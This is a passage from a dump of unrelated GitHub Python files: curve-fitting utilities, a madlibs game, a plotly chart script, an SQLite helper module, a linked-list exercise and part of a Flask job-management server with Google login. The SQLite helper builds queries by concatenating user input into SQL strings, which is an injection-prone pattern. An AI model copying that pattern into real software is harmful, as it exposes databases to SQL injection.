TrainingStatus.WAITING.name\n\n def init_model(self, model_id, model_type, reqs):\n model = Model(model_id, model_type, reqs)\n model.save()\n return model_id, self.get_id()\n\n def finish_training(self, model_id, contribs, improvement):\n model = Model.get(model_id)\n model.status = TrainingStatus.FINISHED.name\n model.improvement = improvement\n model.earned = self._calculate_earnings(model, contribs)\n model.update()\n\n def _calculate_earnings(self, model, contribs):\n proportion_for_trainers = 0.7\n proportion_for_validators = 0.2\n intial_payment_for_linear_regression = 5 # TODO: This has to be refactored later\n if self.get_id() in contribs:\n trainers_pay = intial_payment_for_linear_regression * model.improvement * proportion_for_trainers\n return round(trainers_pay * contribs[self.get_id()], 3)\n else:\n return round(intial_payment_for_linear_regression * proportion_for_validators, 3)\n","repo_name":"DeltaML/data-owner","sub_path":"data_owner/services/data_owner_service.py","file_name":"data_owner_service.py","file_ext":"py","file_size_in_byte":6015,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"12419927186","text":"import numpy as np\r\nfrom scipy.optimize import curve_fit\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\n\r\ndef mean_square_error_fo(bin_values, lambda_: float, beta_: float) -> float:\r\n \"\"\"Computes the mean square error of a first order\r\n linear model with parameters beta_ and lambda_, with\r\n data discretized in steps of 1 unit of time.\r\n \r\n Args:\r\n - bin_values: bin values of the engagement histogram\r\n - beta_: parameter modelling the initial response to\r\n the tweet. 
Should be positive\r\n - lambda_: decay constant which should take values\r\n less than 1\r\n \r\n Returns:\r\n - MSE: the mean square error\r\n \"\"\"\r\n x_hat = beta_\r\n MSE = 0\r\n for x in bin_values:\r\n MSE += (x-x_hat)**2\r\n x_hat *= (1-lambda_)\r\n MSE = MSE / len(bin_values)\r\n return MSE\r\n\r\n\r\ndef eval_error(time, model_engagement, true_engagement) -> tuple[float, float, float]:\r\n \"\"\"Computes the mean square error, and the ratio between the sum of\r\n squared residuals and the sum of the squared signal in continuous time\r\n \r\n Args:\r\n - time: time vector for the observations\r\n - model_engagement: predicted engagement of fitted model\r\n - true_engagement: engagement at times specified in time vector\r\n \r\n Returns:\r\n - MSE: mean square error\r\n - RSS_frac: ratio of residuals squared and sum_signal_squared\r\n - sum_signal_squared: sum of squared signal samples\r\n \"\"\"\r\n res = model_engagement - true_engagement\r\n sq_residual = np.square(res)\r\n sq_signal = np.square(true_engagement)\r\n \r\n MSE = np.mean(sq_residual)\r\n sum_signal_squared = np.sum(sq_signal)\r\n RSS_frac = np.sum(sq_residual)/sum_signal_squared\r\n \r\n #plt.hist(res, bins=200)\r\n #plt.show()\r\n \r\n return MSE, RSS_frac, sum_signal_squared\r\n\r\n\r\ndef lognormal_MLE(x):\r\n mu = np.mean(np.log(x))\r\n sigma = np.mean((np.log(x)-mu)**2)\r\n return mu, sigma\r\n\r\ndef exponential(x_, lambda_, beta_):\r\n \"\"\"Exponential decay with parameters lambda and beta.\"\"\"\r\n return beta_*np.exp(-lambda_*x_)\r\n\r\n\r\ndef log_exponential(x_, lambda_, beta_):\r\n return np.log(exponential(x_, lambda_, beta_))\r\n\r\n\r\ndef log_exp(x_, lambda_, log_beta_):\r\n \"\"\"Logarithm of exponential decay with parameters lambda and beta.\"\"\"\r\n return log_beta_ - lambda_*x_\r\n\r\n\r\ndef power(x_, lambda_, beta_):\r\n \"\"\"Power law.\"\"\"\r\n return beta_*(np.power(np.array(x_, dtype=float), -lambda_))\r\n\r\n\r\ndef estimate_lin_decay(time, engagement):\r\n t, log_eng = [], []\r\n for i, e in enumerate(engagement):\r\n if e != 0:\r\n log_eng.append(np.log(e))\r\n t.append(time[i])\r\n \r\n time = np.array(t)\r\n log_eng = np.array(log_eng)\r\n \r\n lin_model = LinearRegression(fit_intercept=True)\r\n \r\n #log_eng = np.log(np.array(engagement)+1)\r\n lin_model.fit(time.reshape(-1, 1), log_eng.reshape(-1, 1))\r\n \r\n lambda_ = -lin_model.coef_[0][0]\r\n beta_ = np.exp(lin_model.intercept_[0])\r\n \r\n #print(\"coefs:\", lambda_, beta_)\r\n \r\n return lambda_, beta_\r\n \r\n\r\ndef estimate_decay_parameters(time, engagement, loss_='linear', f_scale_=1.0):\r\n \"\"\"Returns an estimate of the parameters of the\r\n exponential decay function of engagement over time.\r\n \r\n Args:\r\n - time: time vector\r\n - engagement: engagement at times specified\r\n in time vector\r\n \r\n Returns:\r\n - popt: optimal parameters\r\n \"\"\"\r\n # lower and upper bounds on lambda and beta:\r\n # 1e-4 <= lambda <= 1e3, and 1 <= beta <= 1e9.\r\n bounds_ = ([1e-4, 1], [1e3, 1e9])\r\n init = [1, 1]\r\n \r\n # Optimization: Trust Region Reflective algorithm 'trf'\r\n # Levenberg-Marquardt ('lm') does not handle parameter bounds\r\n method_ = 'trf'\r\n \r\n # Linear fit (alt. 
L1 fit)\r\n popt, _ = curve_fit(exponential, time, engagement, p0=init,\r\n bounds=bounds_, method=method_, loss=loss_, f_scale=f_scale_)\r\n \r\n # Log fit\r\n #engagement = np.array(engagement)\r\n #log_eng = np.log(engagement+1e-3)\r\n #bounds_ = ([1e-4, 0], [1e3, 9]) # 0 <= log(beta) <= 9\r\n #popt, _ = curve_fit(log_exponential, time, engagement, p0=init,\r\n # bounds=bounds_, method=method_)\r\n \r\n return popt\r\n\r\n\r\ndef delayed_biexponential(x_, alpha, beta, gamma, eta, sigma, delay):\r\n \"\"\"Solution to second order system. Assumes that the time bins\r\n are spaced 1 hour apart (tau_d is the delay given in hours).\r\n \r\n Note that gamma and alpha are positive, whereas they are negative\r\n in the original equation system.\r\n \"\"\"\r\n #tau_dn = int(tau_d*100)\r\n #u_delay = np.concatenate((np.zeros(tau_dn), np.ones(len(x_)-tau_dn)))\r\n #return eta*np.exp(-alpha*x_) + (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-tau_d))*u_delay - (beta/(gamma-alpha))*np.exp(-gamma*(x_-tau_d))*u_delay \r\n delay=int(delay)\r\n delayed = (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-delay)) - (beta/(gamma-alpha))*np.exp(-gamma*(x_-delay))\r\n delayed[:delay] = 0\r\n return eta*np.exp(-alpha*x_) + delayed\r\n\r\n\r\ndef biexponential(x_, alpha, beta, gamma, rho):\r\n \"\"\"Solution to system\r\n dx1/dt = alpha*x1(t) + beta*x2(t)\r\n dx2/dt = gamma*x2(t) + rho*d(t)\r\n \"\"\"\r\n return np.exp(-alpha*(x_))*rho*beta/(gamma-alpha) + np.exp(-gamma*(x_))*rho*(1-(beta/(gamma-alpha)))\r\n\r\n\r\ndef u_biexponential(x_, alpha, beta, gamma, rho):\r\n \"\"\"Solution to system\r\n dx1/dt = alpha*x1(t) + beta*x2(t)\r\n dx2/dt = gamma*x2(t) + rho*d(t)\r\n \"\"\"\r\n if np.abs(gamma - alpha) < 1e-10:\r\n return np.exp(-alpha*(x_))*rho\r\n else:\r\n return np.exp(-alpha*(x_))*rho*beta/(gamma-alpha) + np.exp(-gamma*(x_))*rho*(1-(beta/(gamma-alpha)))\r\n\r\n\r\ndef estimate_unconstr_biexp(time, engagement):\r\n \r\n def biexponential_unconstr_opt(x_, alpha, beta, gamma, rho):\r\n \"\"\"Solution to system\r\n dx1/dt = alpha*x1(t) + beta*x2(t)\r\n dx2/dt = gamma*x2(t) + rho*d(t)\r\n \"\"\"\r\n if np.abs(gamma - alpha) < 1e-10:\r\n return np.exp(-alpha*(x_))*rho\r\n else:\r\n return np.exp(-alpha*(x_))*rho*beta/(gamma-alpha) + np.exp(-gamma*(x_))*rho*(1-(beta/(gamma-alpha)))\r\n \r\n method_ = 'lm'\r\n init = [1, 1, 1, 1]\r\n popt, _ = curve_fit(biexponential_unconstr_opt, time, engagement, p0=init, method=method_)\r\n a, b, g, r = popt[0], popt[1], popt[2], popt[3]\r\n return a, b, g, r\r\n\r\n\r\ndef estimate_biexponential(time, engagement, loss_='linear'):\r\n \r\n def biexponential_opt(x_, alpha, beta, d_gamma, rho):\r\n \"\"\"Solution to system\r\n dx1/dt = alpha*x1(t) + beta*x2(t)\r\n dx2/dt = gamma*x2(t) + rho*d(t)\r\n \"\"\"\r\n gamma = alpha + d_gamma\r\n return np.exp(-alpha*(x_))*rho*beta/(gamma-alpha) + np.exp(-gamma*(x_))*rho*(1-(beta/(gamma-alpha)))\r\n \r\n method_ = 'trf'\r\n # alpha, beta, d_gamma, rho\r\n bounds_ = ([1e-5, 1e-2, 1e-5, 1e-3],\r\n [1e3, 1e9, 1e3, 1e9])\r\n init = [1e-1, 1, 1e-1, 1]\r\n \r\n \"\"\"Alt. 
bounds:\r\n bounds_ = ([0, 0, 1e-9, 1e-9],\r\n [1e9, 1e9, 1e9, 1e9])\r\n init = [1e-1, 1, 1e-1, 1]\r\n \"\"\"\r\n \r\n popt, _ = curve_fit(biexponential_opt, time, engagement,\r\n p0=init, bounds=bounds_, method=method_, loss=loss_)\r\n a, b, d_g, r = popt[0], popt[1], popt[2], popt[3]\r\n g = a + d_g\r\n return a, b, g, r\r\n\r\n\r\ndef estimate_second_order(time, engagement, delay, loss_='linear'):\r\n \"\"\"Fit a second order model of type\r\n dx1/dt = ax1 + bx2 + nd(t) + sd(t-td)\r\n dx2/dt = gx2 + + rd(t-td)\r\n Since r and b are coupled we set r=1\r\n \r\n Args:\r\n - time: time vector\r\n - engagement: engagement at times specified\r\n in time vector\r\n \r\n Returns:\r\n - a, b, g, n, s: model parameters\r\n \"\"\"\r\n \r\n def biexponential_free_delay(x_, d_alpha, beta, gamma, eta, sigma, delay):\r\n \"\"\"Solution to second order system. Assumes that the time bins\r\n are spaced 1 hour apart (tau_d is the delay given in hours).\r\n\r\n Note that gamma and alpha are positive, whereas they are negative\r\n in the original equation system.\r\n \"\"\"\r\n #tau_dn = int(tau_d*100)\r\n #u_delay = np.concatenate((np.zeros(tau_dn), np.ones(len(x_)-tau_dn)))\r\n #return eta*np.exp(-alpha*x_) + (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-tau_d))*u_delay - (beta/(gamma-alpha))*np.exp(-gamma*(x_-tau_d))*u_delay \r\n delay_n=int(delay)\r\n alpha = gamma + d_alpha\r\n delayed = (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-delay)) - (beta/(gamma-alpha))*np.exp(-gamma*(x_-delay))\r\n delayed[:delay_n] = 0\r\n return eta*np.exp(-alpha*x_) + delayed\r\n \r\n def biexponential_fixed_delay(x_, d_alpha, beta, gamma, eta, sigma):\r\n \"\"\"Solution to second order system. Assumes that the time bins\r\n are spaced 1 hour apart (delay is given by encapsulating function hours).\r\n\r\n Note that gamma and alpha are positive, whereas they are negative\r\n in the original equation system.\r\n \"\"\"\r\n #tau_dn = int(tau_d*100)\r\n #u_delay = np.concatenate((np.zeros(tau_dn), np.ones(len(x_)-tau_dn)))\r\n alpha = gamma + d_alpha\r\n delayed = (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-delay)) - (beta/(gamma-alpha))*np.exp(-gamma*(x_-delay))\r\n delayed[:delay] = 0\r\n return eta*np.exp(-alpha*x_) + delayed\r\n # return eta*np.exp(-alpha*x_) + (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-tau_d))*u_delay - (beta/(gamma-alpha))*np.exp(-gamma*(x_-tau_d))*u_delay \r\n\r\n method_ = 'trf'\r\n if delay != 0:\r\n bounds_ = ([1e-5, 1e-2, 1e-5, 1, 1e-5],\r\n [1e3, 1e9, 1e3, 1e9, 1e6])\r\n init = [1e-1, 1, 1e-1, 2, 1]\r\n popt, _ = curve_fit(biexponential_fixed_delay, time, engagement,\r\n p0=init, bounds=bounds_, method=method_, loss=loss_)\r\n d_a, b, g, n, s, td = popt[0], popt[1], popt[2], popt[3], popt[4], 0\r\n \r\n else:\r\n tau_max = int(time[-1]-time[0])\r\n # instead of fitting gamma, use auxillary parameter c=alpha-gamma, which is\r\n # always less than 0 (if alpha and gamma are defined negative) and describes the\r\n # discrepancy between the types of decay. Using gamma < alpha < 0 will give an error.\r\n bounds_ = ([1e-5, 1e-2, 1e-5, 1, 1e-5, 0],\r\n [1e3, 1e9, 1e3, 1e9, 1e6, tau_max])\r\n init = [1e-1, 1, 1e-1, 2, 1, int(0.5*tau_max)]\r\n\r\n # Linear fit (alt. 
L1 fit with 'soft_l1')\r\n popt, _ = curve_fit(biexponential_free_delay, time, engagement,\r\n p0=init, bounds=bounds_, method=method_, loss=loss_)\r\n d_a, b, g, n, s, td = popt[0], popt[1], popt[2], popt[3], popt[4], popt[5]\r\n \r\n a = g + d_a\r\n return a, b, g, n, s, td\r\n","repo_name":"joel-n/exploring-twitter-api","sub_path":"curve_fitting.py","file_name":"curve_fitting.py","file_ext":"py","file_size_in_byte":10893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25063728968","text":"def madlib():\n school_name = input(\"Enter School Name: \")\n adj1 = input(\"Enter Adjective: \")\n color = input(\"Enter Color: \")\n plural_noun = input(\"Enter Plural Noun: \")\n adj2 = input(\"Enter Adjective: \")\n animal = input(\"Enter Animal: \")\n adj3 = input(\"Enter Adjective: \")\n\n paragraph = f\"At {school_name}, students were in for a {adj1} surprise. \\\nThe cafeteria served {color} {plural_noun} for lunch, causing uproar! \\\nThe principal danced a {adj2} jig to resolve the chaos, \\\nwhile the school mascot, a giant {animal}, cheered in the {adj3} gym.\"\n\n print(f\"Your output paragraph is as follows:\\n{paragraph}\")\n","repo_name":"azizmalik787/pythonProjects","sub_path":"madlibs/madlibs_inventory/school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33490363787","text":"\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\n\nimport sqlite3\ncon = sqlite3.connect(r'C:\\Users\\vivek\\Documents\\Code\\local-items\\30daychartchallenge-data\\30daychartchallenge-data.sqlite3')\ndf = pd.read_sql_query(\"SELECT * from 'per-capita-energy-use'\", con)\n\n\n# prepare data\nenergy = energy[energy.Entity.isin(['United Kingdom', 'United States', \\\n 'Australia', 'Chile', 'India'])]\nenergy = energy[energy.Year.isin(['1965', '2019'])]\nenergy.columns = ['country', 'code', 'year', 'value']\nenergy.value = energy.value.round()\n\n# calculate variables for plot\ndf = energy\nyear1=1965\nyear2=2019\nvp_offset = (year2 - year1)/2\nyear1val = df[df.year==1965].value.to_list()\nyear2val = df[df.year==2019].value.to_list()\ncat1val = df[df.year==1965].country.to_list()\nvp_min = -min(year1val+year2val)*0.95\nvp_max = max(year1val+year2val)*1.05\n\n# Making the SLOPEGRAPH using plotly\nimport plotly.graph_objects as go\nfig = go.Figure()\nfor x_val, y_val, cat_val in zip(year1val, year2val, cat1val):\n fig.add_trace(go.Scatter(x=[year1, year2], y=[x_val, y_val], mode='lines+markers+text', text=[cat_val, cat_val], textposition=['middle left', 'middle right'] ))\nfig.update_layout(showlegend=False) \nfig.add_shape(type=\"line\", x0=year1, y0=vp_min, x1=year1, y1=vp_max,line=dict(color=\"Grey\",width=2))\nfig.add_shape(type=\"line\", x0=year2, y0=vp_min, x1=year2, y1=vp_max,line=dict(color=\"Grey\",width=2))\nfig.update_yaxes(range=[vp_min, vp_max] ) #, showticklabels=False)\nfig.update_xaxes(range=[year1-vp_offset, year2+vp_offset] ) # showticklabels=False\n# Title\nfig.add_annotation(dict(xref='paper',yref='paper',x=0.5,y=1.22,xanchor='center',yanchor='top', \nfont=dict(family='Arial',size=24,color='grey'),showarrow=False, \ntext='Energy Use Per Person'))\n# Subtitle\nfig.add_annotation(dict(xref='paper',yref='paper',x=0.5,y=1.085,xanchor='center',yanchor='top',\nfont=dict(family='Arial',size=14,color='grey'),showarrow=False,\ntext='1965 vs 2019'))\n# 
Footer\nfig.add_annotation(dict(xref='paper',yref='paper',x=0.5,y=-0.07,xanchor='center',yanchor='top',\nfont=dict(family='Arial', size=12, color='grey'),showarrow=False,\ntext='#30DayChartChallenge - slope - 2021/04/05'))\nfig.add_annotation(dict(xref='paper',yref='paper',x=0.5,y=-0.13,xanchor='center',yanchor='top',\nfont=dict(family='Arial', size=12, color='grey'),showarrow=False,\ntext='https://ourworldindata.org/grapher/per-capita-energy-use'))\nfig.add_annotation(dict(xref='paper',yref='paper',x=0.5,y=-0.21,xanchor='center',yanchor='top',\nfont=dict(family='Arial', size=12, color='grey'),showarrow=False,\ntext='twitter.com/vivekparasharr | github.com/vivekparasharr | vivekparasharr.medium.com'))\nfig.show()\n","repo_name":"vivekparasharr/Challenges-and-Competitions","sub_path":"30DayChartChallenge/20210405-comparisons-slope.py","file_name":"20210405-comparisons-slope.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"74982621227","text":"import sqlite3\n\nimport loadStickersToDatabase\n\nSQLITE_PATH = \"data_source/database.db\"\n\nDB_CONN = sqlite3.connect(SQLITE_PATH, check_same_thread=False)\n\nPAGE_SYMBOLS = 20\n\n\ndef get_db():\n return DB_CONN\n\n\ndef close_db():\n if DB_CONN is not None:\n DB_CONN.close()\n\n\ndef drop_table():\n sql_str = \"DROP TABLE IF EXISTS \" + loadStickersToDatabase.TICKERS_TABLE\n DB_CONN.execute(sql_str)\n\n\ndef create_table(header_cols):\n # Generate sql string for create table\n sql_str = \"CREATE TABLE \" + loadStickersToDatabase.TICKERS_TABLE\n sql_str += \" (Id INTEGER PRIMARY KEY AUTOINCREMENT,\"\n DB_CONN.execute(sql_str + header_cols + \")\")\n print(\">>>> table created <<<<\")\n\n\ndef insert_row(row_str):\n cur = DB_CONN.cursor()\n cur.execute(row_str)\n DB_CONN.commit()\n\n\ndef get_symbols(fromId=1, fromTicker=\"\"):\n if not fromTicker == \"\":\n sql_str = \"SELECT Id FROM \" + loadStickersToDatabase.TICKERS_TABLE + \" WHERE Symbol='\" + fromTicker + \"'\"\n cursor = DB_CONN.cursor()\n cursor.execute(sql_str)\n records = cursor.fetchall()\n fromId = records[0][0] + 1\n\n toId = fromId + PAGE_SYMBOLS - 1\n\n sql_str = \"SELECT * FROM \" + loadStickersToDatabase.TICKERS_TABLE + \" WHERE Id BETWEEN \" + str(fromId) + \" AND \" + str(toId)\n cursor = DB_CONN.cursor()\n cursor.execute(sql_str)\n return cursor.fetchall()\n\n\ndef search_symbols(search_string):\n if search_string == \"\":\n return \"\"\n else:\n sql_str = \"SELECT * FROM \" + loadStickersToDatabase.TICKERS_TABLE + \" WHERE Symbol LIKE '%\" + search_string + \"%'\"\n cursor = DB_CONN.cursor()\n cursor.execute(sql_str)\n return cursor.fetchall()\n","repo_name":"futurename/C70_Python_Final_Project","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73394429867","text":"class Node:\n def __init__(self, x: int, next: \"Node\" = None, random: \"Node\" = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\n\nclass Solution:\n @staticmethod\n def copy_random_list(head: Node | None) -> Node | None:\n if head is None:\n return None\n\n old_list, new_list = [], []\n\n while head is not None:\n new_node = Node(head.val)\n new_node.random = head.random\n\n if len(new_list) != 0:\n new_list[-1].next = new_node\n\n new_list.append(new_node)\n old_list.append(head)\n head = head.next\n\n for node_1 in new_list:\n if 
node_1.random is None:\n continue\n for index, node_2 in enumerate(old_list):\n if node_1.random == node_2:\n node_1.random = new_list[index]\n\n return new_list[0]\n\n\nif __name__ == \"__main__\":\n Solution().copy_random_list(None)\n","repo_name":"ajesh-mishra/python_leetcode","sub_path":"lc_138_copy_list_with_random_pointer.py","file_name":"lc_138_copy_list_with_random_pointer.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"765050337","text":"from time import time\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom flask import Flask, render_template, redirect, url_for\nfrom flask import request\nfrom flask import session\nfrom flask import make_response\nfrom markupsafe import escape\nimport sys\nimport os\nimport subprocess\nfrom sfapi import Sfapi\n\nimport json\nfrom oauthlib.oauth2 import WebApplicationClient\nimport requests\nimport secrets\nimport string\n\nGOOGLE_CLIENT_ID = os.environ.get(\"GOOGLE_CLIENT_ID\", None)\nGOOGLE_CLIENT_SECRET = os.environ.get(\"GOOGLE_CLIENT_SECRET\", None)\nGOOGLE_DISCOVERY_URL = (\"https://accounts.google.com/.well-known/openid-configuration\")\nif 0:\n print(f\" GOOGLE_CLIENT_ID: {GOOGLE_CLIENT_ID}\")\n print(f\" GOOGLE_CLIENT_SECRET: {GOOGLE_CLIENT_SECRET}\")\n print(f\" GOOGLE_DISCOVERY_URL: {GOOGLE_DISCOVERY_URL}\")\nclient = WebApplicationClient(GOOGLE_CLIENT_ID)\n\n# Return map of [username, googlename] indexed by authorized google IDs.\n# File lines are:\n# username google-id google-name\n# The last may include single spaces\ndef get_google_ids():\n gids = {}\n fnam = '/home/descprod/local/etc/google_ids.txt'\n try:\n fids = open(fnam)\n for line in fids.readlines():\n words = line.split()\n if len(words):\n unam = words[0]\n gid = words[1]\n gnam = ' '.join(words[2:])\n gids[gid] = [unam, gnam]\n fids.close()\n except FileNotFoundError:\n print(f\"get_google_ids: ERROR: Google ID list not found: {fnam}\")\n return gids\n\napp = Flask(__name__, static_url_path='/home/descprod/static')\n\nfrom descprod import sdate\nfrom descprod import UserData\nfrom descprod import JobData\nfrom descprod import JobTable\n\nclass SessionData:\n \"\"\"\n The SessionData class holds global data for the service and its sessions.\n SessionData objects describe sessions.\n \"\"\"\n dbg = False # Log is noisy if true.\n use_cookie_key = True # If true session key is obtained from cookie.\n cookie_key_lifetime = 3600 # Lifetime [sec] to set for cookie keys.\n sessions = {} # Map of active sessions indexed by session key\n current = None # Cache the current session\n site = subprocess.getoutput('cat /home/descprod/local/etc/site.txt')\n google_ids = get_google_ids() # [descname, fullname] indexed by google ID\n lognam = None # Job log file\n stanam = None # Last line is status or processing\n cfgnam = 'config.txt' # Name for config file describing ther job\n logfil = None\n fout = None\n sjob = None\n rundir = None\n com = None\n ret = None\n force_https = False\n @classmethod\n def nologin_session(cls):\n \"\"\"Fetch the data for the no-login session.\"\"\"\n if None not in SessionData.sessions:\n SessionData.sessions[None] = SessionData(None, 'nologin', {})\n return SessionData.sessions[None]\n @classmethod\n def get(cls):\n \"\"\"\n Return the data for the current session.\n If a user is logged in, then sesskey, descname, fullname, login_info etc. 
will be set.\n If not, sesskey is None and name is 'nologin'.\n \"\"\"\n if SessionData.current is not None: return SessionData.current\n if SessionData.use_cookie_key:\n sesskey = request.cookies.get('sesskey')\n if sesskey is None:\n if SessionData.dbg: print('SessionData.get: Cookie with user key not found.')\n else:\n if 'sesskey' in session:\n sesskey = session['sesskey']\n else:\n if SessionData.dbg: print('SessionData.get: Session does not have a key')\n sesskey = None\n if sesskey in cls.sessions:\n SessionData.current = cls.sessions[sesskey]\n else:\n if sesskey is not None:\n print(f\"SessionData.get: ERROR: Unexpected session key: {sesskey}\")\n print(f\"SessionData.get: ERROR: Known keys: {cls.sessions.keys()}\")\n SessionData.current = SessionData.nologin_session()\n return SessionData.current\n def __init__(self, sesskey, descname, fullname=None, login_info={}):\n \"\"\"Add an active user.\"\"\"\n self.sesskey = sesskey\n self.descname = descname\n self.fullname = fullname\n self.login_info = login_info\n self.session_id = 0 if sesskey is None else get_sessionid()\n self.msg = [] # Error message shown once on home page.\n self._user = None\n assert sesskey not in SessionData.sessions\n SessionData.sessions[sesskey] = self\n print(f\"SessionData.init: Updated active user count is {len(SessionData.sessions)}\")\n assert sesskey in SessionData.sessions\n def user(self):\n if self._user is None:\n self._user = UserData.get(self.descname)\n sdat = SessionData.get()\n rstat, sdat.msg = self._user.check_dirs()\n return self._user\n def make_response(self, rdat):\n \"\"\"\n Make an HTML response from the provided response data.\n Typically called from home().\n if SessionData.use_cookie_key is true, then create a new sesskey cookie with\n the value SessionData.cookie_key and lifetime SessionData.cookie_key_lifetime.\n \"\"\"\n resp = make_response(rdat)\n if SessionData.use_cookie_key:\n if self.sesskey is None:\n resp.set_cookie('sesskey', '', expires=0)\n else:\n texp = datetime.timestamp(datetime.now()) + SessionData.cookie_key_lifetime\n resp.set_cookie('sesskey', str(self.sesskey), expires=texp)\n else:\n session.modified = True\n SessionData.current = None\n return resp\n\n# Get the base url from a flask request.\ndef fixurl(url):\n if SessionData.force_https:\n url = url.replace('http:', 'https:', 1)\n return url\n\ndef html_head():\n msg = '\\n'\n msg += '\\n'\n msg += '\\n'\n #msg += f\"\"\" \"\"\"\n msg += '\\n'\n #msg += ' '\n msg += '\\n'\n return msg\n\ndef table_wrap(inmsg):\n msg = ''\n #msg += '
<table>\\n'\n #msg += ''\n msg += inmsg\n #msg += '\\n</table>
    \\n'\n return msg\n\nif __name__ == '__main__':\n app.run(ssl_context=('/home/descprod/cert.pem', 'key.pem'))\napp.secret_key = os.urandom(24)\napp.permanent_session_lifetime = timedelta(minutes=5)\nif 'SERVER_OPTS' in os.environ:\n opts=os.environ['SERVER_OPTS'].split()\n for opt in opts:\n print(f\"Processing server option {opt}\")\n if opt == 'debug':\n SessionData.dbg = True\n elif opt == 'force-https':\n SessionData.force_https = True\n else:\n print(f\"Ignoring invalid option {opt}\")\n\ndef get_jobid():\n fnam = '/home/descprod/local/etc/jobid.txt'\n jobid = int(subprocess.getoutput(f\"descprod-next-jobid\"))\n return jobid\n\ndef get_sessionid():\n lines = subprocess.getoutput(f\"descprod-next-sessionid\").splitlines()\n sesid = int(lines[-1])\n for line in lines[0:-1]:\n print(f\"get_sessionid: {line}\")\n if SessionData.dbg: print(f\"get-sessionid: Session ID is {sesid}\")\n return sesid\n\n@app.route(\"/\")\ndef top():\n return redirect(url_for('home'))\n\n@app.route(\"/home\")\ndef home():\n \"\"\"\n Create and return the home page.\n Most http commands will redirect here.\n If the session doe not have an active user, generic data is displayed\n along with a button to log in.\n If the session is for an authenticated user, his or her info is displayed.\n if sdat.msg has content, it is displayed near the top iof the page and then\n cleared so it will not appear when the page is refreshed.\n It can be either a string or a list of strings.\n The lifetime of the session or cookie user key is refreshed.\n \"\"\"\n #return render_template('index.html')\n if SessionData.dbg: print('home: Constructing home page.')\n sep = '
<br>\\n'\n msg = html_head()\n msg += '<center><h1>DESCprod</h1></center>
    \\n'\n sdat = SessionData.get()\n udat = sdat.user()\n if SessionData.dbg: print(f\"home: User is {sdat.user()} [{sdat.sesskey}]\")\n have_user = sdat.sesskey is not None\n if have_user and True:\n # Refresh page each time listener selects browser tab.\n msg += '\\n'\n # Refresh page every 60 sec.\n #msg += '\\n'\n if have_user or True:\n if len(sdat.msg):\n if isinstance(sdat.msg, list):\n lines = sdat.msg\n else:\n lines = [str(sdat.msg)]\n msg += f\"
<hr>\\n\"\n            msg += f\"<pre>\\n\"\n            lsep = ''\n            for line in lines:\n                msg += f\"{lsep}{line}\"\n                lsep = '\\n'\n            msg += f\"\\n</pre>\\n\"\n            msg += f\"<hr>
    {sep}\"\n sdat.msg = []\n msg += f\"Site: {SessionData.site}\"\n msg += sep\n if have_user:\n msg += f\"User: {sdat.descname}\"\n if sdat.fullname is not None: msg+= f\" ({sdat.fullname})\"\n #msg += f\" [{sdat.sesskey}]\"\n msg += sep\n #msg += f\"Login info: {sdat.login_info}\"\n #msg += sep\n msg += f\"Session: {sdat.session_id}\"\n msg += sep\n msg += f\"UTC time: {sdate()}\"\n #msg += f\" [{sdat.sesskey}]\"\n msg += sep\n msg += sep\n jtab = JobTable(udat.descname)\n if (jtab.error_message):\n msg += f\"ERROR: {jtab.error_message}\"\n return sdat.make_response(msg)\n # Use the last job to to get the starting job config if it is not already set.\n if udat.jobtype == '':\n jids = list(jtab.jobs.keys())\n if len(jids):\n jids.sort()\n jid_last = jids[-1]\n job_last = jtab.jobs[jid_last]\n udat.jobtype = job_last.jobtype()\n udat.config = job_last.config()\n udat.howfig = job_last.howfig()\n njob = len(jtab.jobs)\n msg += f\"User {udat.descname} has {njob} active job\"\n if njob != 1: msg += 's'\n if njob:\n msg += ':'\n msg += sep\n msg += table_wrap(jtab.to_html(fixurl(request.base_url)[0:-5]))\n msg += sep\n #msg += f\"{status()}\"\n #if SessionData.stanam is not None:\n # sjstat = 'Not found'\n # try:\n # jsin = open(SessionData.stanam, 'r')\n # sjtext = jsin.readlines()\n # if len(sjtext): sjstat = sjtext[-1]\n # except FileNotFoundError:\n # sjstat = f\"File not found: {SessionData.stanam}\"\n # msg += sep\n # msg += f\"Status: {sjstat}\"\n #if SessionData.sjobid is not None:\n # msg += sep\n # msg += f\"Config: {SessionData.sjob}\"\n # msg += sep\n # msg += f\"Command: {SessionData.com}\"\n # msg += sep\n # msg += f\"Run dir: {SessionData.rundir}\"\n msg += sep\n msg += f'''\\nCreate job: '''\n msg += f''''''\n msg += f''''''\n msg += f''''''\n msg += f''''\n msg += sep\n msg += '\\n'\n msg += '\\n'\n msg += '\\n'\n #msg += ''\n msg += '\\n'\n if udat.is_admin(): msg += '\\n'\n else:\n msg += sep\n msg += ''\n msg += '
